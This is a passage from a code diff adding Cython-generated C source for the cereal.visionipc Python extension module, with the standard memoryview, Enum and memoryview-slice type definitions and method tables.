__pyx_MemviewEnum_obj *p; + PyObject *o; + #if CYTHON_COMPILING_IN_LIMITED_API + allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); + o = alloc_func(t, 0); + #else + if (likely(!__Pyx_PyType_HasFeature(t, Py_TPFLAGS_IS_ABSTRACT))) { + o = (*t->tp_alloc)(t, 0); + } else { + o = (PyObject *) PyBaseObject_Type.tp_new(t, __pyx_empty_tuple, 0); + } + if (unlikely(!o)) return 0; + #endif + p = ((struct __pyx_MemviewEnum_obj *)o); + p->name = Py_None; Py_INCREF(Py_None); + return o; +} + +static void __pyx_tp_dealloc_Enum(PyObject *o) { + struct __pyx_MemviewEnum_obj *p = (struct __pyx_MemviewEnum_obj *)o; + #if CYTHON_USE_TP_FINALIZE + if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && !__Pyx_PyObject_GC_IsFinalized(o)) { + if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_Enum) { + if (PyObject_CallFinalizerFromDealloc(o)) return; + } + } + #endif + PyObject_GC_UnTrack(o); + Py_CLEAR(p->name); + (*Py_TYPE(o)->tp_free)(o); +} + +static int __pyx_tp_traverse_Enum(PyObject *o, visitproc v, void *a) { + int e; + struct __pyx_MemviewEnum_obj *p = (struct __pyx_MemviewEnum_obj *)o; + if (p->name) { + e = (*v)(p->name, a); if (e) return e; + } + return 0; +} + +static int __pyx_tp_clear_Enum(PyObject *o) { + PyObject* tmp; + struct __pyx_MemviewEnum_obj *p = (struct __pyx_MemviewEnum_obj *)o; + tmp = ((PyObject*)p->name); + p->name = Py_None; Py_INCREF(Py_None); + Py_XDECREF(tmp); + return 0; +} + +static PyObject *__pyx_specialmethod___pyx_MemviewEnum___repr__(PyObject *self, CYTHON_UNUSED PyObject *arg) { + return __pyx_MemviewEnum___repr__(self); +} + +static PyMethodDef __pyx_methods_Enum[] = { + {"__repr__", (PyCFunction)__pyx_specialmethod___pyx_MemviewEnum___repr__, METH_NOARGS|METH_COEXIST, 0}, + {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw___pyx_MemviewEnum_1__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw___pyx_MemviewEnum_3__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {0, 0, 0, 0} +}; +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_type___pyx_MemviewEnum_slots[] = { + {Py_tp_dealloc, (void *)__pyx_tp_dealloc_Enum}, + {Py_tp_repr, (void *)__pyx_MemviewEnum___repr__}, + {Py_tp_traverse, (void *)__pyx_tp_traverse_Enum}, + {Py_tp_clear, (void *)__pyx_tp_clear_Enum}, + {Py_tp_methods, (void *)__pyx_methods_Enum}, + {Py_tp_init, (void *)__pyx_MemviewEnum___init__}, + {Py_tp_new, (void *)__pyx_tp_new_Enum}, + {0, 0}, +}; +static PyType_Spec __pyx_type___pyx_MemviewEnum_spec = { + "cereal.visionipc.visionipc_pyx.Enum", + sizeof(struct __pyx_MemviewEnum_obj), + 0, + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_HAVE_GC, + __pyx_type___pyx_MemviewEnum_slots, +}; +#else + +static PyTypeObject __pyx_type___pyx_MemviewEnum = { + PyVarObject_HEAD_INIT(0, 0) + "cereal.visionipc.visionipc_pyx.""Enum", /*tp_name*/ + sizeof(struct __pyx_MemviewEnum_obj), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + __pyx_tp_dealloc_Enum, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + __pyx_MemviewEnum___repr__, /*tp_repr*/ + 0, /*tp_as_number*/ + 0, /*tp_as_sequence*/ + 0, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + 0, /*tp_str*/ + 0, /*tp_getattro*/ + 0, /*tp_setattro*/ + 0, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_HAVE_GC, /*tp_flags*/ + 0, /*tp_doc*/ + __pyx_tp_traverse_Enum, /*tp_traverse*/ + __pyx_tp_clear_Enum, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ + __pyx_methods_Enum, /*tp_methods*/ + 0, /*tp_members*/ + 0, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + __pyx_MemviewEnum___init__, /*tp_init*/ + 0, /*tp_alloc*/ + __pyx_tp_new_Enum, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + 0, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + #endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, /*tp_pypy_flags*/ + #endif +}; +#endif +static struct __pyx_vtabstruct_memoryview __pyx_vtable_memoryview; + +static PyObject *__pyx_tp_new_memoryview(PyTypeObject *t, PyObject *a, PyObject *k) { + struct __pyx_memoryview_obj *p; + PyObject *o; + #if CYTHON_COMPILING_IN_LIMITED_API + allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); + o = alloc_func(t, 0); + #else + if (likely(!__Pyx_PyType_HasFeature(t, Py_TPFLAGS_IS_ABSTRACT))) { + o = (*t->tp_alloc)(t, 0); + } else { + o = (PyObject *) PyBaseObject_Type.tp_new(t, __pyx_empty_tuple, 0); + } + if (unlikely(!o)) return 0; + #endif + p = ((struct __pyx_memoryview_obj *)o); + p->__pyx_vtab = __pyx_vtabptr_memoryview; + p->obj = Py_None; Py_INCREF(Py_None); + p->_size = Py_None; Py_INCREF(Py_None); + p->_array_interface = Py_None; Py_INCREF(Py_None); + p->view.obj = NULL; + if (unlikely(__pyx_memoryview___cinit__(o, a, k) < 0)) goto bad; + return o; + bad: + Py_DECREF(o); o = 0; + return NULL; +} + +static void __pyx_tp_dealloc_memoryview(PyObject *o) { + struct __pyx_memoryview_obj *p = (struct __pyx_memoryview_obj *)o; + #if CYTHON_USE_TP_FINALIZE + if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && !__Pyx_PyObject_GC_IsFinalized(o)) { + if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_memoryview) { + if (PyObject_CallFinalizerFromDealloc(o)) return; + } + } + #endif + PyObject_GC_UnTrack(o); + { + PyObject *etype, *eval, *etb; + PyErr_Fetch(&etype, &eval, &etb); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) + 1); + __pyx_memoryview___dealloc__(o); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) - 1); + PyErr_Restore(etype, eval, etb); + } + Py_CLEAR(p->obj); + Py_CLEAR(p->_size); + Py_CLEAR(p->_array_interface); + (*Py_TYPE(o)->tp_free)(o); +} + +static int __pyx_tp_traverse_memoryview(PyObject *o, visitproc v, void *a) { + int e; + struct __pyx_memoryview_obj *p = (struct __pyx_memoryview_obj *)o; + if (p->obj) { + e = (*v)(p->obj, a); if (e) return e; + } + if (p->_size) { + e = (*v)(p->_size, a); if (e) return e; + } + if (p->_array_interface) { + e = (*v)(p->_array_interface, a); if (e) return e; + } + if (p->view.obj) { + e = (*v)(p->view.obj, a); if (e) return e; + } + return 0; +} + +static int __pyx_tp_clear_memoryview(PyObject *o) { + PyObject* tmp; + struct __pyx_memoryview_obj *p = (struct __pyx_memoryview_obj *)o; + tmp = ((PyObject*)p->obj); + p->obj = Py_None; Py_INCREF(Py_None); + Py_XDECREF(tmp); + tmp = ((PyObject*)p->_size); + p->_size = Py_None; Py_INCREF(Py_None); + Py_XDECREF(tmp); + tmp = ((PyObject*)p->_array_interface); + p->_array_interface = Py_None; Py_INCREF(Py_None); + Py_XDECREF(tmp); + Py_CLEAR(p->view.obj); + return 0; +} +static PyObject *__pyx_sq_item_memoryview(PyObject *o, Py_ssize_t i) { + PyObject *r; + PyObject *x = PyInt_FromSsize_t(i); if(!x) return 0; + r = Py_TYPE(o)->tp_as_mapping->mp_subscript(o, x); + Py_DECREF(x); + return r; +} + +static int __pyx_mp_ass_subscript_memoryview(PyObject *o, PyObject *i, PyObject *v) { + if (v) { + return __pyx_memoryview___setitem__(o, i, v); + } + else { + __Pyx_TypeName o_type_name; + o_type_name = __Pyx_PyType_GetName(Py_TYPE(o)); + PyErr_Format(PyExc_NotImplementedError, + "Subscript deletion not supported by " __Pyx_FMT_TYPENAME, o_type_name); + __Pyx_DECREF_TypeName(o_type_name); + return -1; + } +} + +static PyObject *__pyx_getprop___pyx_memoryview_T(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_15View_dot_MemoryView_10memoryview_1T_1__get__(o); +} + +static PyObject *__pyx_getprop___pyx_memoryview_base(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_15View_dot_MemoryView_10memoryview_4base_1__get__(o); +} + +static PyObject *__pyx_getprop___pyx_memoryview_shape(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_15View_dot_MemoryView_10memoryview_5shape_1__get__(o); +} + +static PyObject *__pyx_getprop___pyx_memoryview_strides(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_15View_dot_MemoryView_10memoryview_7strides_1__get__(o); +} + +static PyObject *__pyx_getprop___pyx_memoryview_suboffsets(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_15View_dot_MemoryView_10memoryview_10suboffsets_1__get__(o); +} + +static PyObject *__pyx_getprop___pyx_memoryview_ndim(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_15View_dot_MemoryView_10memoryview_4ndim_1__get__(o); +} + +static PyObject *__pyx_getprop___pyx_memoryview_itemsize(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_15View_dot_MemoryView_10memoryview_8itemsize_1__get__(o); +} + +static PyObject *__pyx_getprop___pyx_memoryview_nbytes(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_15View_dot_MemoryView_10memoryview_6nbytes_1__get__(o); +} + +static PyObject *__pyx_getprop___pyx_memoryview_size(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_15View_dot_MemoryView_10memoryview_4size_1__get__(o); +} + +static PyObject *__pyx_specialmethod___pyx_memoryview___repr__(PyObject *self, CYTHON_UNUSED PyObject *arg) { + return __pyx_memoryview___repr__(self); +} + +static PyMethodDef __pyx_methods_memoryview[] = { + {"__repr__", (PyCFunction)__pyx_specialmethod___pyx_memoryview___repr__, METH_NOARGS|METH_COEXIST, 0}, + {"is_c_contig", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_memoryview_is_c_contig, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"is_f_contig", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_memoryview_is_f_contig, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"copy", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_memoryview_copy, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"copy_fortran", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_memoryview_copy_fortran, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw___pyx_memoryview_1__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw___pyx_memoryview_3__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {0, 0, 0, 0} +}; + +static struct PyGetSetDef __pyx_getsets_memoryview[] = { + {(char *)"T", __pyx_getprop___pyx_memoryview_T, 0, (char *)0, 0}, + {(char *)"base", __pyx_getprop___pyx_memoryview_base, 0, (char *)0, 0}, + {(char *)"shape", __pyx_getprop___pyx_memoryview_shape, 0, (char *)0, 0}, + {(char *)"strides", __pyx_getprop___pyx_memoryview_strides, 0, (char *)0, 0}, + {(char *)"suboffsets", __pyx_getprop___pyx_memoryview_suboffsets, 0, (char *)0, 0}, + {(char *)"ndim", __pyx_getprop___pyx_memoryview_ndim, 0, (char *)0, 0}, + {(char *)"itemsize", __pyx_getprop___pyx_memoryview_itemsize, 0, (char *)0, 0}, + {(char *)"nbytes", __pyx_getprop___pyx_memoryview_nbytes, 0, (char *)0, 0}, + {(char *)"size", __pyx_getprop___pyx_memoryview_size, 0, (char *)0, 0}, + {0, 0, 0, 0, 0} +}; +#if CYTHON_USE_TYPE_SPECS +#if !CYTHON_COMPILING_IN_LIMITED_API + +static PyBufferProcs __pyx_tp_as_buffer_memoryview = { + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getreadbuffer*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getwritebuffer*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getsegcount*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getcharbuffer*/ + #endif + __pyx_memoryview_getbuffer, /*bf_getbuffer*/ + 0, /*bf_releasebuffer*/ +}; +#endif +static PyType_Slot __pyx_type___pyx_memoryview_slots[] = { + {Py_tp_dealloc, (void *)__pyx_tp_dealloc_memoryview}, + {Py_tp_repr, (void *)__pyx_memoryview___repr__}, + {Py_sq_length, (void *)__pyx_memoryview___len__}, + {Py_sq_item, (void *)__pyx_sq_item_memoryview}, + {Py_mp_length, (void *)__pyx_memoryview___len__}, + {Py_mp_subscript, (void *)__pyx_memoryview___getitem__}, + {Py_mp_ass_subscript, (void *)__pyx_mp_ass_subscript_memoryview}, + {Py_tp_str, (void *)__pyx_memoryview___str__}, + #if defined(Py_bf_getbuffer) + {Py_bf_getbuffer, (void *)__pyx_memoryview_getbuffer}, + #endif + {Py_tp_traverse, (void *)__pyx_tp_traverse_memoryview}, + {Py_tp_clear, (void *)__pyx_tp_clear_memoryview}, + {Py_tp_methods, (void *)__pyx_methods_memoryview}, + {Py_tp_getset, (void *)__pyx_getsets_memoryview}, + {Py_tp_new, (void *)__pyx_tp_new_memoryview}, + {0, 0}, +}; +static PyType_Spec __pyx_type___pyx_memoryview_spec = { + "cereal.visionipc.visionipc_pyx.memoryview", + sizeof(struct __pyx_memoryview_obj), + 0, + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_HAVE_GC, + __pyx_type___pyx_memoryview_slots, +}; +#else + +static PySequenceMethods __pyx_tp_as_sequence_memoryview = { + __pyx_memoryview___len__, /*sq_length*/ + 0, /*sq_concat*/ + 0, /*sq_repeat*/ + __pyx_sq_item_memoryview, /*sq_item*/ + 0, /*sq_slice*/ + 0, /*sq_ass_item*/ + 0, /*sq_ass_slice*/ + 0, /*sq_contains*/ + 0, /*sq_inplace_concat*/ + 0, /*sq_inplace_repeat*/ +}; + +static PyMappingMethods __pyx_tp_as_mapping_memoryview = { + __pyx_memoryview___len__, /*mp_length*/ + __pyx_memoryview___getitem__, /*mp_subscript*/ + __pyx_mp_ass_subscript_memoryview, /*mp_ass_subscript*/ +}; + +static PyBufferProcs __pyx_tp_as_buffer_memoryview = { + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getreadbuffer*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getwritebuffer*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getsegcount*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getcharbuffer*/ + #endif + __pyx_memoryview_getbuffer, /*bf_getbuffer*/ + 0, /*bf_releasebuffer*/ +}; + +static PyTypeObject __pyx_type___pyx_memoryview = { + PyVarObject_HEAD_INIT(0, 0) + "cereal.visionipc.visionipc_pyx.""memoryview", /*tp_name*/ + sizeof(struct __pyx_memoryview_obj), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + __pyx_tp_dealloc_memoryview, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + __pyx_memoryview___repr__, /*tp_repr*/ + 0, /*tp_as_number*/ + &__pyx_tp_as_sequence_memoryview, /*tp_as_sequence*/ + &__pyx_tp_as_mapping_memoryview, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + __pyx_memoryview___str__, /*tp_str*/ + 0, /*tp_getattro*/ + 0, /*tp_setattro*/ + &__pyx_tp_as_buffer_memoryview, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_HAVE_GC, /*tp_flags*/ + 0, /*tp_doc*/ + __pyx_tp_traverse_memoryview, /*tp_traverse*/ + __pyx_tp_clear_memoryview, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ + __pyx_methods_memoryview, /*tp_methods*/ + 0, /*tp_members*/ + __pyx_getsets_memoryview, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + 0, /*tp_init*/ + 0, /*tp_alloc*/ + __pyx_tp_new_memoryview, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + 0, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + #endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, /*tp_pypy_flags*/ + #endif +}; +#endif +static struct __pyx_vtabstruct__memoryviewslice __pyx_vtable__memoryviewslice; + +static PyObject *__pyx_tp_new__memoryviewslice(PyTypeObject *t, PyObject *a, PyObject *k) { + struct __pyx_memoryviewslice_obj *p; + PyObject *o = __pyx_tp_new_memoryview(t, a, k); + if (unlikely(!o)) return 0; + p = ((struct __pyx_memoryviewslice_obj *)o); + p->__pyx_base.__pyx_vtab = (struct __pyx_vtabstruct_memoryview*)__pyx_vtabptr__memoryviewslice; + new((void*)&(p->from_slice)) __Pyx_memviewslice(); + p->from_object = Py_None; Py_INCREF(Py_None); + p->from_slice.memview = NULL; + return o; +} + +static void __pyx_tp_dealloc__memoryviewslice(PyObject *o) { + struct __pyx_memoryviewslice_obj *p = (struct __pyx_memoryviewslice_obj *)o; + #if CYTHON_USE_TP_FINALIZE + if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && !__Pyx_PyObject_GC_IsFinalized(o)) { + if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc__memoryviewslice) { + if (PyObject_CallFinalizerFromDealloc(o)) return; + } + } + #endif + PyObject_GC_UnTrack(o); + { + PyObject *etype, *eval, *etb; + PyErr_Fetch(&etype, &eval, &etb); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) + 1); + __pyx_memoryviewslice___dealloc__(o); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) - 1); + PyErr_Restore(etype, eval, etb); + } + __Pyx_call_destructor(p->from_slice); + Py_CLEAR(p->from_object); + PyObject_GC_Track(o); + __pyx_tp_dealloc_memoryview(o); +} + +static int __pyx_tp_traverse__memoryviewslice(PyObject *o, visitproc v, void *a) { + int e; + struct __pyx_memoryviewslice_obj *p = (struct __pyx_memoryviewslice_obj *)o; + e = __pyx_tp_traverse_memoryview(o, v, a); if (e) return e; + if (p->from_object) { + e = (*v)(p->from_object, a); if (e) return e; + } + return 0; +} + +static int __pyx_tp_clear__memoryviewslice(PyObject *o) { + PyObject* tmp; + struct __pyx_memoryviewslice_obj *p = (struct __pyx_memoryviewslice_obj *)o; + __pyx_tp_clear_memoryview(o); + tmp = ((PyObject*)p->from_object); + p->from_object = Py_None; Py_INCREF(Py_None); + Py_XDECREF(tmp); + __PYX_XCLEAR_MEMVIEW(&p->from_slice, 1); + return 0; +} + +static PyMethodDef __pyx_methods__memoryviewslice[] = { + {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw___pyx_memoryviewslice_1__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw___pyx_memoryviewslice_3__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {0, 0, 0, 0} +}; +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_type___pyx_memoryviewslice_slots[] = { + {Py_tp_dealloc, (void *)__pyx_tp_dealloc__memoryviewslice}, + {Py_tp_doc, (void *)PyDoc_STR("Internal class for passing memoryview slices to Python")}, + {Py_tp_traverse, (void *)__pyx_tp_traverse__memoryviewslice}, + {Py_tp_clear, (void *)__pyx_tp_clear__memoryviewslice}, + {Py_tp_methods, (void *)__pyx_methods__memoryviewslice}, + {Py_tp_new, (void *)__pyx_tp_new__memoryviewslice}, + {0, 0}, +}; +static PyType_Spec __pyx_type___pyx_memoryviewslice_spec = { + "cereal.visionipc.visionipc_pyx._memoryviewslice", + sizeof(struct __pyx_memoryviewslice_obj), + 0, + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_SEQUENCE, + __pyx_type___pyx_memoryviewslice_slots, +}; +#else + +static PyTypeObject __pyx_type___pyx_memoryviewslice = { + PyVarObject_HEAD_INIT(0, 0) + "cereal.visionipc.visionipc_pyx.""_memoryviewslice", /*tp_name*/ + sizeof(struct __pyx_memoryviewslice_obj), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + __pyx_tp_dealloc__memoryviewslice, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + #if CYTHON_COMPILING_IN_PYPY || 0 + __pyx_memoryview___repr__, /*tp_repr*/ + #else + 0, /*tp_repr*/ + #endif + 0, /*tp_as_number*/ + 0, /*tp_as_sequence*/ + 0, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + #if CYTHON_COMPILING_IN_PYPY || 0 + __pyx_memoryview___str__, /*tp_str*/ + #else + 0, /*tp_str*/ + #endif + 0, /*tp_getattro*/ + 0, /*tp_setattro*/ + 0, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_SEQUENCE, /*tp_flags*/ + PyDoc_STR("Internal class for passing memoryview slices to Python"), /*tp_doc*/ + __pyx_tp_traverse__memoryviewslice, /*tp_traverse*/ + __pyx_tp_clear__memoryviewslice, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ + __pyx_methods__memoryviewslice, /*tp_methods*/ + 0, /*tp_members*/ + 0, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + 0, /*tp_init*/ + 0, /*tp_alloc*/ + __pyx_tp_new__memoryviewslice, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + 0, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + #endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, /*tp_pypy_flags*/ + #endif +}; +#endif + +static PyMethodDef __pyx_methods[] = { + {0, 0, 0, 0} +}; +#ifndef CYTHON_SMALL_CODE +#if defined(__clang__) + #define CYTHON_SMALL_CODE +#elif defined(__GNUC__) && (__GNUC__ > 4 || (__GNUC__ == 4 && __GNUC_MINOR__ >= 3)) + #define CYTHON_SMALL_CODE __attribute__((cold)) +#else + #define CYTHON_SMALL_CODE +#endif +#endif +/* #### Code section: pystring_table ### */ + +static int __Pyx_CreateStringTabAndInitStrings(void) { + __Pyx_StringTabEntry __pyx_string_tab[] = { + {&__pyx_kp_b_, __pyx_k_, sizeof(__pyx_k_), 0, 0, 0, 0}, + {&__pyx_kp_s_, __pyx_k_, sizeof(__pyx_k_), 0, 0, 1, 0}, + {&__pyx_n_s_ASCII, __pyx_k_ASCII, sizeof(__pyx_k_ASCII), 0, 0, 1, 1}, + {&__pyx_kp_s_All_dimensions_preceding_dimensi, __pyx_k_All_dimensions_preceding_dimensi, sizeof(__pyx_k_All_dimensions_preceding_dimensi), 0, 0, 1, 0}, + {&__pyx_n_s_AssertionError, __pyx_k_AssertionError, sizeof(__pyx_k_AssertionError), 0, 0, 1, 1}, + {&__pyx_kp_s_Buffer_view_does_not_expose_stri, __pyx_k_Buffer_view_does_not_expose_stri, sizeof(__pyx_k_Buffer_view_does_not_expose_stri), 0, 0, 1, 0}, + {&__pyx_kp_s_Can_only_create_a_buffer_that_is, 